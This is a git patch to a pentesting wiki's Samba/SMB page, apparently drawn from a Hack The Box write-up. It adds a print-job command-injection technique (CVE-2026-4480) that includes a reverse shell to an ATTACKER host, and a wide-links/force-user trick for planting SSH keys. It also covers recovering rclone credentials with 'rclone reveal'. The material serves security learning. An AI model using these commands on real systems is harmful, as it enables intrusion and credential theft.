From d72e82dcdd1540e3c71b73d538f3c4b4252a6693 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 7 Jul 2026 14:44:50 +0000 Subject: [PATCH] Add content from: HTB Abducted: Samba CVE-2026-4480 RCE, rclone Credential Rec... --- .../pentesting-smb/README.md | 114 ++++++++++++++++-- 1 file changed, 104 insertions(+), 10 deletions(-) diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index d2eb20318c4..b56a81b02b2 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md @@ -449,19 +449,109 @@ The **default config of** a **Samba** server is usually located in `/etc/samba/s | **Setting** | **Description** | | --------------------------- | ------------------------------------------------------------------- | -| `browseable = yes` | Allow listing available shares in the current share? | -| `read only = no` | Forbid the creation and modification of files? | -| `writable = yes` | Allow users to create and modify files? | -| `guest ok = yes` | Allow connecting to the service without using a password? | -| `enable privileges = yes` | Honor privileges assigned to specific SID? | -| `create mask = 0777` | What permissions must be assigned to the newly created files? | -| `directory mask = 0777` | What permissions must be assigned to the newly created directories? | -| `logon script = script.sh` | What script needs to be executed on the user's login? | -| `magic script = script.sh` | Which script should be executed when the script gets closed? | -| `magic output = script.out` | Where the output of the magic script needs to be stored? | +| `browseable = yes` | Allow listing available shares in the current share? | +| `read only = no` | Forbid the creation and modification of files? | +| `writable = yes` | Allow users to create and modify files? | +| `guest ok = yes` | Allow connecting to the service without using a password? | +| `printable = yes` | Expose the share as a printer queue instead of a disk share? | +| `print command = ... %J %s` | Run a shell command on the server with client-controlled job metadata? | +| `enable privileges = yes` | Honor privileges assigned to specific SID? | +| `force user = ` | Perform every file operation as another UNIX user after authentication? | +| `wide links = yes` | Allow the share to follow symlinks outside the exported directory tree? | +| `allow insecure wide links = yes` | Disable Samba's safety coupling between `wide links` and UNIX extensions? | +| `create mask = 0777` | What permissions must be assigned to the newly created files? | +| `directory mask = 0777` | What permissions must be assigned to the newly created directories? | +| `logon script = script.sh` | What script needs to be executed on the user's login? | +| `magic script = script.sh` | Which script should be executed when the script gets closed? | +| `magic output = script.out` | Where the output of the magic script needs to be stored? | The command `smbstatus` gives information about the **server** and about **who is connected**. +### Printable shares and shell-based `print command` injection + +A **printer share** may look uninteresting because `ls` fails, but it can still accept jobs via `smbclient`'s `print ` command. Enumerate them with: + +```bash +smbclient -L /// -N +rpcclient -N -U "" -c 'enumprinters; netshareenumall' +``` + +If the server-side share uses a shell-based `print command`, treat any `print command` line containing `%J` as high risk. NVD describes CVE-2026-4480 as Samba passing the **client-controlled job description string** into `print command` via `%J` without escaping shell metacharacters, turning the print job name into an OS command injection primitive. + +Typical risky pattern: + +```ini +[printer] +path = /var/spool/samba +printable = yes +guest ok = yes +print command = /usr/local/bin/print-helper %J %s +``` + +Quick checks and abuse ideas: + +```bash +# confirm the share is printable even if directory listing fails +smbclient ///PRINTER -N +smb: \> print payload + +# search local configs after foothold on the server +grep -R "^[[:space:]]*print command\|%J\|printable\|guest ok" /etc/samba 2>/dev/null + +# if %J is injected into a shell command, the job name itself becomes interesting +echo 'id' > '|sh' +smbclient ///PRINTER -N -c 'print "|sh"' + +echo 'bash -i >& /dev/tcp/ATTACKER/443 0>&1' > '|bash' +smbclient ///PRINTER -N -c 'print "|bash"' +``` + +The same primitive can also be reached over the `\pipe\spoolss` RPC endpoint: open the printer, set `DocumentInfo1.document_name` to the malicious job name that should land in `%J`, write the body as the spool data, and finish the job to trigger the print command. + +### `wide links` + `force user` = write outside the share as another UNIX user + +`wide links = yes` lets Samba follow symlinks that point **outside** the exported path. The official Samba docs note that this is normally constrained by UNIX extensions, and that `allow insecure wide links = yes` removes that protection. If the same share also sets `force user = `, then an authenticated user can make Samba **write as the forced UNIX account**. + +High-value combination: + +```ini +[transfer] +path = /srv/transfer +valid users = scott +force user = marcus +read only = no +wide links = yes + +[global] +allow insecure wide links = yes +unix extensions = no +``` + +Abuse flow: + +```bash +# from a shell on the Samba server +ln -s /home/marcus /srv/transfer/marcus + +# traverse the symlink over SMB, not locally +smbclient ///transfer -U scott%PASSWORD +smb: \> ls +smb: \> cd marcus +smb: \marcus\> mkdir .ssh +smb: \marcus\> put ~/.ssh/id_ed25519.pub .ssh/authorized_keys +``` + +The important nuance is that local filesystem access may still fail for the attacker, but SMB traversal succeeds because Samba performs the operation as the **forced user**, not as the account that authenticated to the share. + +### Loot readable backup configs after Samba footholds + +After landing on a Samba host, look for backup/sync configs such as `rclone.conf`. Rclone documents that config passwords are only **obscured**, not securely protected, so readable config files can expose reusable secrets: + +```bash +find / -name rclone.conf 2>/dev/null +rclone reveal +``` + ## Authenticate using Kerberos You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**: @@ -684,6 +774,10 @@ Entry_6: ## References +- [0xdf - HTB Abducted](https://0xdf.gitlab.io/2026/07/07/htb-abducted.html) +- [Samba `smb.conf` man page](https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html) +- [NVD - CVE-2026-4480](https://nvd.nist.gov/vuln/detail/CVE-2026-4480) +- [Rclone `obscure` documentation](https://rclone.org/commands/rclone_obscure/) - [NetExec (CME) wiki – Kerberos usage](https://www.netexec.wiki/) - [Pentesting Kerberos (88) – client setup and troubleshooting](../pentesting-kerberos-88/README.md) - [ShareHound (collector)](https://github.com/p0dalirius/sharehound)